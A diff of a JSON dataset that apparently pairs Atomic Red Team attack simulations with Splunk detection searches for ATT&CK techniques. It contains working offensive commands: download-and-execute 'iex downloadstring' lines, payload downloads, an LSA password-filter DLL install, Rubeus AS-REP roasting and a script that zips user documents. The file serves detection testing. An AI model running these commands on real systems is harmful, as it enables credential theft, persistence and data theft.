\"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_VBScript.msi\" -OutFile \"#{msi_payload}\"\n" } ], "executor": { @@ -220371,8 +222364,8 @@ "dependencies": [ { "description": "The MSI file must exist on disk at specified location (#{msi_payload})\n", - "prereq_command": "if (Test-Path #{msi_payload}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{msi_payload}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_DLL.msi\" -OutFile \"#{msi_payload}\"\n" + "prereq_command": "if (Test-Path \"#{msi_payload}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{msi_payload}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_DLL.msi\" -OutFile \"#{msi_payload}\"\n" } ], "executor": { @@ -220408,8 +222401,8 @@ "dependencies": [ { "description": "The MSI file must exist on disk at specified location (#{msi_payload})\n", - "prereq_command": "if (Test-Path #{msi_payload}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{msi_payload}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_EXE.msi\" -OutFile \"#{msi_payload}\"\n" + "prereq_command": "if (Test-Path \"#{msi_payload}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{msi_payload}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_EXE.msi\" -OutFile \"#{msi_payload}\"\n" } ], "executor": { @@ -220440,8 +222433,8 @@ "dependencies": [ { "description": "The MSI file must exist on disk at specified location (#{msi_payload})\n", - "prereq_command": "if (Test-Path #{msi_payload}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{msi_payload}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi\" -OutFile \"#{msi_payload}\"\n" + "prereq_command": "if (Test-Path \"#{msi_payload}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{msi_payload}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi\" -OutFile \"#{msi_payload}\"\n" } ], "executor": { @@ -220472,8 +222465,8 @@ "dependencies": [ { "description": "The MSI file must exist on disk at specified location (#{msi_payload})\n", - "prereq_command": "if (Test-Path #{msi_payload}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{msi_payload}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_VBScript.msi\" -OutFile \"#{msi_payload}\"\n" + "prereq_command": "if (Test-Path \"#{msi_payload}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{msi_payload}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_VBScript.msi\" -OutFile \"#{msi_payload}\"\n" } ], "executor": { @@ -220504,8 +222497,8 @@ "dependencies": [ { "description": "The MSI file must exist on disk at specified location (#{msi_payload})\n", - "prereq_command": "if (Test-Path #{msi_payload}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{msi_payload}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_DLL.msi\" -OutFile \"#{msi_payload}\"\n" + "prereq_command": "if (Test-Path \"#{msi_payload}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{msi_payload}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_DLL.msi\" -OutFile \"#{msi_payload}\"\n" } ], "executor": { @@ -220536,8 +222529,8 @@ "dependencies": [ { "description": "The MSI file must exist on disk at specified location (#{msi_payload})\n", - "prereq_command": "if (Test-Path #{msi_payload}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{msi_payload}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_EXE.msi\" -OutFile \"#{msi_payload}\"\n" + "prereq_command": "if (Test-Path \"#{msi_payload}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{msi_payload}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_EXE.msi\" -OutFile \"#{msi_payload}\"\n" } ], "executor": { @@ -220568,8 +222561,8 @@ "dependencies": [ { "description": "The DLL must exist on disk at specified location (#{dll_payload})\n", - "prereq_command": "if (Test-Path #{dll_payload}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/MSIRunner.dll -OutFile \"#{dll_payload}\"\n" + "prereq_command": "if (Test-Path \"#{dll_payload}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{dll_payload}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/MSIRunner.dll -OutFile \"#{dll_payload}\"\n" } ], "executor": { @@ -220600,8 +222593,8 @@ "dependencies": [ { "description": "The DLL must exist on disk at specified location (#{dll_payload})\n", - "prereq_command": "if (Test-Path #{dll_payload}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/MSIRunner.dll -OutFile \"#{dll_payload}\"\n" + "prereq_command": "if (Test-Path \"#{dll_payload}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{dll_payload}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/MSIRunner.dll -OutFile \"#{dll_payload}\"\n" } ], "executor": { @@ -222590,7 +224583,7 @@ { "name": "Windows MSIExec With Network Connections", "description": "The following analytic identifies MSIExec with any network connection over port 443 or 80. Typically, MSIExec does not perform network communication to the internet.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where `process_msiexec` by _time Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | join process_id [| tstats `security_content_summariesonly` count FROM datamodel=Network_Traffic.All_Traffic where All_Traffic.dest_port IN (\"80\",\"443\") by All_Traffic.process_id All_Traffic.dest All_Traffic.dest_port All_Traffic.dest_ip | `drop_dm_object_name(All_Traffic)` ] | table _time dest parent_process_name process_name process_path process process_id dest_port dest_ip | `windows_msiexec_with_network_connections_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where `process_msiexec` by _time Processes.user Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | join process_id [| tstats `security_content_summariesonly` count FROM datamodel=Network_Traffic.All_Traffic where All_Traffic.dest_port IN (\"80\",\"443\") by All_Traffic.process_id All_Traffic.dest All_Traffic.dest_port All_Traffic.dest_ip | `drop_dm_object_name(All_Traffic)` ] | table _time user dest parent_process_name process_name process_path process process_id dest_port dest_ip | `windows_msiexec_with_network_connections_filter`", "tags": { "name": "Windows MSIExec With Network Connections", "analytic_story": [ @@ -222603,7 +224596,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "An instance of $process_name$ was identified on endpoint $dest$ contacting a remote destination.", + "message": "An instance of $process_name$ was identified on endpoint $dest$ contacting a remote destination $dest_ip$", "mitre_attack_id": [ "T1218.007" ], @@ -223450,7 +225443,7 @@ } ], "command_list": [ - "reg.exe export HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\ \\T1556.002\\lsa_backup.reg\n$passwordFilterName = (Copy-Item \"\\T1556.002\\bin\\AtomicRedTeamPWFilter.dll\" -Destination \"C:\\Windows\\System32\" -PassThru).basename\n$lsaKey = Get-Item \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\\"\n$notificationPackagesValues = $lsaKey.GetValue(\"Notification Packages\")\n$notificationPackagesValues += $passwordFilterName\nSet-ItemProperty \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\\" \"Notification Packages\" $notificationPackagesValues\n" + "reg.exe export HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\ \"\\T1556.002\\lsa_backup.reg\"\n$passwordFilterName = (Copy-Item \"\\T1556.002\\bin\\AtomicRedTeamPWFilter.dll\" -Destination \"C:\\Windows\\System32\" -PassThru).basename\n$lsaKey = Get-Item \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\\"\n$notificationPackagesValues = $lsaKey.GetValue(\"Notification Packages\")\n$notificationPackagesValues += $passwordFilterName\nSet-ItemProperty \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\\" \"Notification Packages\" $notificationPackagesValues\n" ], "commands": [], "queries": [], @@ -223485,13 +225478,13 @@ "dependencies": [ { "description": "AtomicRedTeamPWFilter.dll must exist on disk at specified location (#{dll_path}\\#{dll_name})\n", - "prereq_command": "if (Test-Path #{dll_path}\\#{dll_name}) {exit 0} else {exit 1}\n", + "prereq_command": "if (Test-Path \"#{dll_path}\\#{dll_name}\") {exit 0} else {exit 1}\n", "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInvoke-WebRequest \"https://github.com/redcanaryco/atomicredteam/atomics/T1556.002/bin/AtomicRedTeamPWFilter.dll\" -OutFile \"#{dll_path}\\#{dll_name}\"\n" } ], "executor": { - "command": "reg.exe export HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\ PathToAtomicsFolder\\T1556.002\\lsa_backup.reg\n$passwordFilterName = (Copy-Item \"#{dll_path}\\#{dll_name}\" -Destination \"C:\\Windows\\System32\" -PassThru).basename\n$lsaKey = Get-Item \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\\"\n$notificationPackagesValues = $lsaKey.GetValue(\"Notification Packages\")\n$notificationPackagesValues += $passwordFilterName\nSet-ItemProperty \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\\" \"Notification Packages\" $notificationPackagesValues\n", - "cleanup_command": "reg.exe import PathToAtomicsFolder\\T1556.002\\lsa_backup.reg\nremove-item C:\\Windows\\System32\\#{dll_name}\n", + "command": "reg.exe export HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\ \"PathToAtomicsFolder\\T1556.002\\lsa_backup.reg\"\n$passwordFilterName = (Copy-Item \"#{dll_path}\\#{dll_name}\" -Destination \"C:\\Windows\\System32\" -PassThru).basename\n$lsaKey = Get-Item \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\\"\n$notificationPackagesValues = $lsaKey.GetValue(\"Notification Packages\")\n$notificationPackagesValues += $passwordFilterName\nSet-ItemProperty \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\\" \"Notification Packages\" $notificationPackagesValues\n", + "cleanup_command": "reg.exe import \"PathToAtomicsFolder\\T1556.002\\lsa_backup.reg\"\nremove-item C:\\Windows\\System32\\#{dll_name}\n", "name": "powershell", "elevation_required": true } @@ -227268,7 +229261,7 @@ } ], "command_list": [ - "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /out:\"%tmp%\\T1106.exe\" /target:exe \\T1106\\src\\CreateProcess.cs\n%tmp%/T1106.exe\n", + "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /out:\"%tmp%\\T1106.exe\" /target:exe \"\\T1106\\src\\CreateProcess.cs\"\n%tmp%/T1106.exe\n", "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/CreateProcess/Get-CreateProcessSystem.ps1')", "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/CreateProcess/Get-CreateProcessSystemBind.ps1')", "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/NamedPipe/NamedPipeSystem.ps1')", @@ -227312,12 +229305,12 @@ "dependencies": [ { "description": "#{source_file} must exist on system.\n", - "prereq_command": "if (Test-Path #{source_file}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1106/src/CreateProcess.cs\" -OutFile \"#{source_file}\"\n" + "prereq_command": "if (Test-Path \"#{source_file}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{source_file}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1106/src/CreateProcess.cs\" -OutFile \"#{source_file}\"\n" } ], "executor": { - "command": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /out:\"#{output_file}\" /target:exe #{source_file}\n%tmp%/T1106.exe\n", + "command": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /out:\"#{output_file}\" /target:exe \"#{source_file}\"\n%tmp%/T1106.exe\n", "name": "command_prompt" } }, @@ -227775,13 +229768,13 @@ }, { "description": "Rubeus must exist\n", - "prereq_command": "if(Test-Path -Path #{local_folder}\\#{local_executable}) {exit 0} else {exit 1}\n", + "prereq_command": "if(Test-Path -Path \"#{local_folder}\\#{local_executable}\") {exit 0} else {exit 1}\n", "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\\#{local_executable}\n" } ], "executor": { "command": "cmd.exe /c \"#{local_folder}\\#{local_executable}\" asreproast /outfile:\"#{local_folder}\\#{out_file}\"\n", - "cleanup_command": "Remove-Item #{local_folder}\\#{out_file} -ErrorAction Ignore\n", + "cleanup_command": "Remove-Item \"#{local_folder}\\#{out_file}\" -ErrorAction Ignore\n", "name": "powershell", "elevation_required": false } @@ -227852,7 +229845,7 @@ { "name": "Disabled Kerberos Pre-Authentication Discovery With Get-ADUser", "description": "The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-ADUser` commandlet with specific parameters. `Get-ADUser` is part of the Active Directory PowerShell module used to manage Windows Active Directory networks. As the name suggests, `Get-ADUser` is used to query for domain users. With the appropiate parameters, Get-ADUser allows adversaries to discover domain accounts with Kerberos Pre Authentication disabled.\\ Red Teams and adversaries alike use may abuse Get-ADUSer to enumerate these accounts and attempt to crack their passwords offline.", - "search": " `powershell` EventCode=4104 (ScriptBlockText = \"*Get-ADUser*\" AND ScriptBlockText=\"*4194304*\") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `disabled_kerberos_pre_authentication_discovery_with_get_aduser_filter`", + "search": " `powershell` EventCode=4104 (ScriptBlockText = \"*Get-ADUser*\" AND ScriptBlockText=\"*4194304*\") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | rename Computer as dest | `security_content_ctime(firstTime)` | `disabled_kerberos_pre_authentication_discovery_with_get_aduser_filter`", "tags": { "name": "Disabled Kerberos Pre-Authentication Discovery With Get-ADUser", "analytic_story": [ @@ -227908,7 +229901,7 @@ { "name": "Disabled Kerberos Pre-Authentication Discovery With PowerView", "description": "The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-DomainUser` commandlet with specific parameters. `Get-DomainUser` is part of PowerView, a PowerShell tool used to perform enumeration on Windows Active Directory networks. As the name suggests, `Get-DomainUser` is used to identify domain users and combining it with `-PreauthNotRequired` allows adversaries to discover domain accounts with Kerberos Pre Authentication disabled.\\ Red Teams and adversaries alike use may leverage PowerView to enumerate these accounts and attempt to crack their passwords offline.", - "search": " `powershell` EventCode=4104 (ScriptBlockText = \"*Get-DomainUser*\" AND ScriptBlockText=\"*PreauthNotRequired*\") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `disabled_kerberos_pre_authentication_discovery_with_powerview_filter`", + "search": " `powershell` EventCode=4104 (ScriptBlockText = \"*Get-DomainUser*\" AND ScriptBlockText=\"*PreauthNotRequired*\") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | rename Computer as dest | `security_content_ctime(firstTime)` | `disabled_kerberos_pre_authentication_discovery_with_powerview_filter`", "tags": { "name": "Disabled Kerberos Pre-Authentication Discovery With PowerView", "analytic_story": [ @@ -227964,7 +229957,7 @@ { "name": "Kerberos Pre-Authentication Flag Disabled in UserAccountControl", "description": "The following analytic leverages Windows Security Event 4738, `A user account was changed`, to identify a change performed on a domain user object that disables Kerberos Pre-Authentication. Disabling the Pre Authentication flag in the UserAccountControl property allows an adversary to easily perform a brute force attack against the user's password offline leveraging the ASP REP Roasting technique. Red Teams and adversaries alike who have obtained privileges in an Active Directory network may use this technique as a backdoor or a way to escalate privileges.", - "search": " `wineventlog_security` EventCode=4738 MSADChangedAttributes=\"*Don't Require Preauth' - Enabled*\" | table EventCode, Account_Name, Security_ID, MSADChangedAttributes | `kerberos_pre_authentication_flag_disabled_in_useraccountcontrol_filter`", + "search": " `wineventlog_security` EventCode=4738 MSADChangedAttributes=\"*Don't Require Preauth' - Enabled*\" |rename Account_Name as user | table EventCode, user, dest, Security_ID, MSADChangedAttributes | `kerberos_pre_authentication_flag_disabled_in_useraccountcontrol_filter`", "tags": { "name": "Kerberos Pre-Authentication Flag Disabled in UserAccountControl", "analytic_story": [ @@ -227977,7 +229970,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "Kerberos Pre Authentication was Disabled for $Account_Name$", + "message": "Kerberos Pre Authentication was Disabled for $user$", "mitre_attack_id": [ "T1558", "T1558.004" @@ -227987,8 +229980,8 @@ ], "observable": [ { - "name": "dest", - "type": "Endpoint", + "name": "user", + "type": "User Name", "role": [ "Victim" ] @@ -228020,7 +230013,7 @@ { "name": "Kerberos Pre-Authentication Flag Disabled with PowerShell", "description": "The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Set-ADAccountControl` commandlet with specific parameters. `Set-ADAccountControl` is part of the Active Directory PowerShell module used to manage Windows Active Directory networks. As the name suggests, `Set-ADAccountControl` is used to modify User Account Control values for an Active Directory domain account. With the appropiate parameters, Set-ADAccountControl allows adversaries to disable Kerberos Pre-Authentication for an account to to easily perform a brute force attack against the user's password offline leveraging the ASP REP Roasting technique. Red Teams and adversaries alike who have obtained privileges in an Active Directory network may use this technique as a backdoor or a way to escalate privileges.", - "search": "`powershell` EventCode=4104 (ScriptBlockText = \"*Set-ADAccountControl*\" AND ScriptBlockText=\"*DoesNotRequirePreAuth:$true*\") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `kerberos_pre_authentication_flag_disabled_with_powershell_filter`", + "search": "`powershell` EventCode=4104 (ScriptBlockText = \"*Set-ADAccountControl*\" AND ScriptBlockText=\"*DoesNotRequirePreAuth:$true*\") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `kerberos_pre_authentication_flag_disabled_with_powershell_filter`", "tags": { "name": "Kerberos Pre-Authentication Flag Disabled with PowerShell", "analytic_story": [ @@ -231029,6 +233022,7 @@ } ], "command_list": [ + "$startingDirectory = \"C:\\Users\"\n$outputZip = \"\\..\\ExternalPayloads\\T1005\"\n$fileExtensionsString = \".doc, .docx, .txt\" \n$fileExtensions = $fileExtensionsString -split \", \"\n\nNew-Item -Type Directory $outputZip -ErrorAction Ignore -Force | Out-Null\n\nFunction Search-Files {\n param (\n [string]$directory\n )\n $files = Get-ChildItem -Path $directory -File -Recurse | Where-Object {\n $fileExtensions -contains $_.Extension.ToLower()\n }\n return $files\n}\n\n$foundFiles = Search-Files -directory $startingDirectory\nif ($foundFiles.Count -gt 0) {\n $foundFilePaths = $foundFiles.FullName\n Compress-Archive -Path $foundFilePaths -DestinationPath \"$outputZip\\data.zip\"\n\n Write-Host \"Zip file created: $outputZip\\data.zip\"\n } else {\n Write-Host \"No files found with the specified extensions.\"\n }\n", "powershell/collection/get_sql_column_sample_data", "powershell/collection/get_sql_query", "powershell/collection/minidump", @@ -231051,7 +233045,49 @@ ], "commands": [], "queries": [], - "parsed_datasets": [], + "parsed_datasets": [ + { + "source": "atomics/T1005/T1005.yaml", + "name": "Atomic Red Team Test - Data from Local System", + "content": { + "attack_technique": "T1005", + "display_name": "Data from Local System", + "atomic_tests": [ + { + "name": "Search files of interest and save them to a single zip file (Windows)", + "auto_generated_guid": "d3d9af44-b8ad-4375-8b0a-4bff4b7e419c", + "description": "This test searches for files of certain extensions and saves them to a single zip file prior to extraction. \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "starting_directory": { + "description": "Path to starting directory for the search", + "type": "Path", + "default": "C:\\Users" + }, + "output_zip_folder_path": { + "description": "Path to directory for saving the generated zip file", + "type": "Path", + "default": "PathToAtomicsFolder\\..\\ExternalPayloads\\T1005" + }, + "file_extensions": { + "description": "List of file extensions to be searched and zipped, separated by comma and space", + "type": "string", + "default": ".doc, .docx, .txt" + } + }, + "executor": { + "command": "$startingDirectory = \"#{starting_directory}\"\n$outputZip = \"#{output_zip_folder_path}\"\n$fileExtensionsString = \"#{file_extensions}\" \n$fileExtensions = $fileExtensionsString -split \", \"\n\nNew-Item -Type Directory $outputZip -ErrorAction Ignore -Force | Out-Null\n\nFunction Search-Files {\n param (\n [string]$directory\n )\n $files = Get-ChildItem -Path $directory -File -Recurse | Where-Object {\n $fileExtensions -contains $_.Extension.ToLower()\n }\n return $files\n}\n\n$foundFiles = Search-Files -directory $startingDirectory\nif ($foundFiles.Count -gt 0) {\n $foundFilePaths = $foundFiles.FullName\n Compress-Archive -Path $foundFilePaths -DestinationPath \"$outputZip\\data.zip\"\n\n Write-Host \"Zip file created: $outputZip\\data.zip\"\n } else {\n Write-Host \"No files found with the specified extensions.\"\n }\n", + "cleanup_command": "Remove-Item -Path $outputZip\\data.zip -Force\n", + "name": "powershell", + "elevation_required": false + } + } + ] + } + } + ], "possible_detections": [ { "technique_id": "T1005", @@ -231332,7 +233368,7 @@ { "name": "Sqlite Module In Temp Folder", "description": "This search is to detect a suspicious file creation of sqlite3.dll in %temp% folder. This behavior was seen in IcedID malware where it download sqlite module to parse browser database like for chrome or firefox to stole browser information related to bank, credit card or credentials.", - "search": "`sysmon` EventCode=11 (TargetFilename = \"*\\\\sqlite32.dll\" OR TargetFilename = \"*\\\\sqlite64.dll\") (TargetFilename = \"*\\\\temp\\\\*\") |stats count min(_time) as firstTime max(_time) as lastTime by process_name TargetFilename EventCode ProcessId Image | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `sqlite_module_in_temp_folder_filter`", + "search": "`sysmon` EventCode=11 (TargetFilename = \"*\\\\sqlite32.dll\" OR TargetFilename = \"*\\\\sqlite64.dll\") (TargetFilename = \"*\\\\temp\\\\*\") | stats count min(_time) as firstTime max(_time) as lastTime by dest signature signature_id process_name file_name file_path action process_guid| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `sqlite_module_in_temp_folder_filter`", "tags": { "name": "Sqlite Module In Temp Folder", "analytic_story": [ @@ -231345,7 +233381,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "process $SourceImage$ create a file $TargetImage$ in host $Computer$", + "message": "Process $process_name$ create a file $file_name$ in host $dest$", "mitre_attack_id": [ "T1005" ], @@ -231354,14 +233390,14 @@ ], "observable": [ { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" ] }, { - "name": "SourceImage", + "name": "process_name", "type": "Process", "role": [ "Attacker" @@ -232484,12 +234520,13 @@ { "name": "CertUtil With Decode Argument", "description": "CertUtil.exe may be used to `encode` and `decode` a file, including PE and script code. Encoding will convert a file to base64 with `-----BEGIN CERTIFICATE-----` and `-----END CERTIFICATE-----` tags. Malicious usage will include decoding a encoded file that was downloaded. Once decoded, it will be loaded by a parallel process. Note that there are two additional command switches that may be used - `encodehex` and `decodehex`. Similarly, the file will be encoded in HEX and later decoded for further execution. During triage, identify the source of the file being decoded. Review its contents or execution behavior for further analysis.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_certutil` Processes.process=*decode* by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `certutil_with_decode_argument_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_certutil` Processes.process=*decode* by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `certutil_with_decode_argument_filter`", "tags": { "name": "CertUtil With Decode Argument", "analytic_story": [ "Deobfuscate-Decode Files or Information", - "Living Off The Land" + "Living Off The Land", + "Forest Blizzard" ], "asset_type": "Endpoint", "cis20": [ @@ -234695,7 +236732,7 @@ { "name": "AWS Network Access Control List Deleted", "description": "Enforcing network-access controls is one of the defensive mechanisms used by cloud administrators to restrict access to a cloud instance. After the attacker has gained control of the AWS console by compromising an admin account, they can delete a network ACL and gain access to the instance from anywhere. This search will query the AWS CloudTrail logs to detect users deleting network ACLs.", - "search": "`cloudtrail` eventName=DeleteNetworkAclEntry requestParameters.egress=false | fillnull | stats count min(_time) as firstTime max(_time) as lastTime by userName userIdentity.principalId eventName requestParameters.egress src userAgent | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `aws_network_access_control_list_deleted_filter`", + "search": "`cloudtrail` eventName=DeleteNetworkAclEntry requestParameters.egress=false | fillnull | stats count min(_time) as firstTime max(_time) as lastTime by user_arn userIdentity.principalId eventName requestParameters.egress src userAgent | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `aws_network_access_control_list_deleted_filter`", "tags": { "name": "AWS Network Access Control List Deleted", "analytic_story": [ @@ -235033,7 +237070,7 @@ { "name": "Attempt To Stop Security Service", "description": "This search looks for attempts to stop security-related services on the endpoint.", - "search": "| tstats `security_content_summariesonly` values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_net` OR Processes.process_name = sc.exe Processes.process=\"* stop *\" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` |lookup security_services_lookup service as process OUTPUTNEW category, description | search category=security | `attempt_to_stop_security_service_filter`", + "search": "| tstats `security_content_summariesonly` values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_net` OR Processes.process_name = sc.exe Processes.process=\"* stop *\" by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` |lookup security_services_lookup service as process OUTPUTNEW category, description | search category=security | `attempt_to_stop_security_service_filter`", "tags": { "name": "Attempt To Stop Security Service", "analytic_story": [ @@ -235136,7 +237173,7 @@ { "name": "Disable AMSI Through Registry", "description": "this search is to identify modification in registry to disable AMSI windows feature to evade detections. This technique was seen in several ransomware, RAT and even APT to impaire defenses of the compromise machine and to be able to execute payload with minimal alert as much as possible.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows Script\\\\Settings\\\\AmsiEnable\" Registry.registry_value_data = \"0x00000000\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` 